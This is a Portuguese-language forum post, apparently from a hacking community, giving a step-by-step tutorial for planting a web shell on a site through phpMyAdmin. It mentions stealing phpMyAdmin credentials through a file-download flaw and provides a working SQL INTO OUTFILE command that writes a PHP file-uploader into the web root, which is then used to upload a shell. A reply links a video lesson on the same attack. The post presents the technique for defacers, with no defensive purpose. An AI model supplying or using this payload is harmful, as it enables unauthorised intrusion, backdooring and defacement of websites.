Upload de shell via phpmyadmin

Antes de começar esse pequeno tutorial , ja vou dizendo que não é sempre que você vai conseguir upar shell com esse metodo '-' , a maioria das vezes o usuario do phpmyadmin não tem privilegios suficientes para criar um arquivo no diretorio do site.

Existem muitos metodos de ser obter a senha e o login do phpmyadmin a mais comum é explorando a falha conhecida como RFD (famosa "fopen") , nela o defacer faz download dos php's do site vulneravel.

Logado no phpmyadmin do site clique em SQL e digite:

Código:

SELECT '<?php echo \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\'; echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\'; @copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\']) ?>' INTO OUTFILE '$path/upload.php'

no lugar de $path voce irar colocar o path onde se encontra o site , exe:
Linux: /home/mmxm/public_html/

Windows: C:\\mmxm\\htdocs\\

[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]

Clique em executar.
Se o arquivo for criado sera exibido a seguinte mensagem:

[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]

depois é so acessar o site , exe: [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] , e upar a sua shell por esse form de upload

eae galera blz ?

aproveitando o tópico estou postando uma vídeo aula de como upar shell no PHPMYADMIN.

download : 4shared.com /file/2mUTii-3/uploadshellbyphpmyadmin.html

créditos vídeo aula : dwango